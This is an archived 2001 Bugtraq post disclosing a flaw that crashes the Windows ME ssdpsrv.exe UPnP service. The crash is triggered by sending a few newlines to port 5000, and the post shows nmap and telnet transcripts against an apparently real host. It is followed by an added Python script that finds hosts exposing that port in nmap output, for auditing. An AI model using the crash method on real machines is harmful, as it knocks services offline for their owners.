Ssdpsrv.exe in WindowsME

From: milo omega (mtwoar@hotmail.com)
Date: 10/18/01


From: "milo omega" <mtwoar@hotmail.com>
To: bugtraq@securityfocus.com
Subject: Ssdpsrv.exe in WindowsME
Date: Wed, 17 Oct 2001 19:46:29 -0500
Message-ID: <F15tMIO5pt4gVvpQN1R00009e33@hotmail.com>

By connecting to a computer running Ssdpsrv you are able to crash the
Ssdpsrv server.

Ssdpsrv.exe is the file that starts the UPnP server on WindowsME boxes.
This service comes standard with the WindowsME installation.

The Ssdpsrv.exe server is started at boot.
Here is the registry entry:
  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices
Here is the file that starts the server:
  c:\windows\system\ssdpsrv.exe

For information about UPnP go here:
  http://support.microsoft.com/support/kb/articles/Q262/4/58.ASP

Upon running a scan on a computer running the server I get the following:
<snip>
  bash-2.05$ nmap -sT 165.121.234.217
  Starting nmap V. 2.54BETA29 ( www.insecure.org/nmap/ )
  Interesting ports on user-2injqmp.dialup.mindspring.com (165.121.234.217):
  (The 1547 ports scanned but not shown below are in state: closed)
  Port State Service
  139/tcp open netbios-ssn
  5000/tcp open fics
  Nmap run completed -- 1 IP address (1 host up) scanned in 14 seconds
</snap>

Method to crash Ssdpsrv:
  Connect to the computer on port 5000.
  Send 3 to 5 newline characters.
  You then get an error and are disconnected.
<snip>
  bash-2.05$ telnet 165.121.234.217 5000
  Trying 165.121.234.217...
  Connected to 165.121.234.217.
  Escape character is '^]'.

  HTTP/1.1 400 Bad Request

  Connection closed by foreign host.
  bash-2.05$
</snap>

Here is the error caused by the crash:
  Ssdpsrv has caused an error in MSVCRT.DLL.
  Ssdpsrv will now close.
  If you continue to experience problems,
  try restarting your computer.

This causes the server to crash and closes port 5000.
Either you must restart the server by manually running ssdpsrv.exe
or reboot.

shouts to pulltheplug #c.
:o
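
For auditing scans of your own network for machines that still expose this listener, the following added example (not part of the original post) parses saved nmap text output in the format shown above and lists hosts reporting 5000/tcp open. The function names, sample scan text and addresses are constructed for illustration.

```python
import re

# Host header lines: the nmap 2.54 form seen in the post, plus the modern form.
HOST_RE = re.compile(
    r"^\s*(?:Interesting ports on|Nmap scan report for)\s+(.*?)\s*:?\s*$"
)
# Port table rows such as "5000/tcp open fics".
PORT_RE = re.compile(r"^\s*(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)")

def split_host(label):
    """Return (name, ip) from 'name (ip)', '(ip)' or a bare address."""
    m = re.match(r"^(.*?)\s*\(([^)]+)\)$", label)
    if m:
        return m.group(1), m.group(2)
    return "", label

def hosts_exposing(nmap_text, port=5000, proto="tcp"):
    """List hosts whose scan block shows port/proto in state 'open'.

    An open 5000/tcp is only a lead: confirm on the host that
    ssdpsrv.exe is what is listening before acting on it.
    """
    found, current = [], None
    for line in nmap_text.splitlines():
        h = HOST_RE.match(line)
        if h:
            current = split_host(h.group(1))
            continue
        p = PORT_RE.match(line)
        if p and current and (int(p.group(1)), p.group(2), p.group(3)) == (port, proto, "open"):
            if current not in found:
                found.append(current)
    return found

# Constructed sample scan output (documentation addresses, not real hosts).
SAMPLE = """\
Interesting ports on winme-lab.example (192.0.2.10):
(The 1547 ports scanned but not shown below are in state: closed)
Port       State       Service
139/tcp    open        netbios-ssn
5000/tcp   open        fics
Interesting ports on  (192.0.2.11):
Port       State       Service
139/tcp    open        netbios-ssn
5000/tcp   filtered    fics
Nmap scan report for 192.0.2.12
PORT     STATE SERVICE
5000/tcp open  upnp
"""

if __name__ == "__main__":
    for name, ip in hosts_exposing(SAMPLE):
        print(f"{ip}\t{name or '-'}\t5000/tcp open")
```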
